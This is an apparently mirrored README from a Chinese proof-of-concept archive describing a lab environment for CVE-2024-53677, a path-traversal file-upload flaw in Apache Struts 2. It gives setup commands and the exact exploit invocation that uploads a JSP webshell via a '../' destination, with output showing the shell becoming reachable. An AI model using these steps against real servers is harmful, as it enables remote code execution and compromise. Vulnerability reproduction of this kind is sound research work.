关联漏洞
标题:
Apache Struts 安全漏洞
(CVE-2024-53677)
描述:Apache Struts是美国阿帕奇(Apache)基金会的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。 Apache Struts 2.0.0版本至6.4.0之前版本存在安全漏洞,该漏洞源于文件上传逻辑缺陷。
描述
Vulnerable Environment and Exploit for CVE-2024-53677
介绍
CVE-2024-53677 - Apache Struts 2 Remote Code Execution Vulnerability (RCE) Reproduction Environment
This repository provides a container-based environment to reproduce the CVE-2024-53677 vulnerability in Apache Struts 2. This vulnerability involves path traversal and allows for arbitrary code execution (RCE) through the file upload functionality in Struts 2.
## Setup Instructions
The environment can be built and run using Podman. Follow these steps to set up the application:
```sh[
git clone https://github.com/seanrickerd/CVE-2024-53677.git
cd CVE-2024-53677
podman build --ulimit nofile=122880:122880 -m 3G -t cve-2024-53677 .
podman run -d -p 8080:8080 --ulimit nofile=122880:122880 -m 3G --rm -it --name cve-2024-53677 cve-2024-53677
```
Running the exploit:
```sh
pip install -r requirements.txt
python S2-067.py -u http://localhost:8080 --upload_endpoint /upload.action --files newshell.jsp --destination ../newshell.jsp
```
There is an intermittent issue where the file will upload properly but will not be accessible. To work around this, you will need to add an extra . to the destination, then re-run the original command.
```sh
$ python S2-067.py -u http://localhost:8080 --upload_endpoint /upload.action --files shell.jsp --destination ../shell.jsp
[INFO] Uploading files to http://localhost:8080/upload.action...
[SUCCESS] File newshell.jsp uploaded successfully: ../shell.jsp
[INFO] Verifying uploaded file: http://localhost:8080/shell.jsp
[INFO] File not accessible. HTTP Status: 404
$ python S2-067.py -u http://localhost:8080 --upload_endpoint /upload.action --files shell.jsp --destination .../shell.jsp
[INFO] Uploading files to http://localhost:8080/upload.action...
[SUCCESS] File newshell.jsp uploaded successfully: .../shell.jsp
[INFO] Verifying uploaded file: http://localhost:8080/.../shell.jsp
[INFO] File not accessible. HTTP Status: 404
$ python S2-067.py -u http://localhost:8080 --upload_endpoint /upload.action --files shell.jsp --destination ../shell.jsp
[INFO] Uploading files to http://localhost:8080/upload.action...
[SUCCESS] File newshell.jsp uploaded successfully: ../shell.jsp
[INFO] Verifying uploaded file: http://localhost:8080/shell.jsp
[ALERT] File uploaded and accessible: http://localhost:8080/shell.jsp
```
The shell will be accessible via a browser at http://localhost:8080/shell.jsp
文件快照
[4.0K] /data/pocs/97833870b6af64d294a56b45f085952b85d3c398
├── [1.3K] context.xml
├── [ 612] Dockerfile
├── [2.3K] README.md
├── [ 512] requirements.txt
├── [5.5K] S2-067.py
├── [ 877] shell.jsp
├── [4.0K] struts-app
│ ├── [8.9K] mvnw
│ ├── [5.7K] mvnw.cmd
│ ├── [3.7K] pom.xml
│ ├── [4.0K] src
│ │ └── [4.0K] main
│ │ ├── [4.0K] java
│ │ │ └── [4.0K] org
│ │ │ └── [4.0K] trackflaw
│ │ │ └── [4.0K] example
│ │ │ └── [2.0K] Upload.java
│ │ ├── [4.0K] resources
│ │ │ └── [1.2K] struts.xml
│ │ └── [4.0K] webapp
│ │ ├── [ 219] index.html
│ │ └── [4.0K] WEB-INF
│ │ ├── [ 587] error.jsp
│ │ ├── [ 658] success.jsp
│ │ ├── [ 705] upload.jsp
│ │ └── [1.1K] web.xml
│ └── [4.0K] target
│ └── [4.0K] classes
│ ├── [4.0K] org
│ │ └── [4.0K] trackflaw
│ │ └── [4.0K] example
│ │ └── [2.5K] Upload.class
│ └── [1.2K] struts.xml
└── [ 219] tomcat-users.xml
15 directories, 19 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。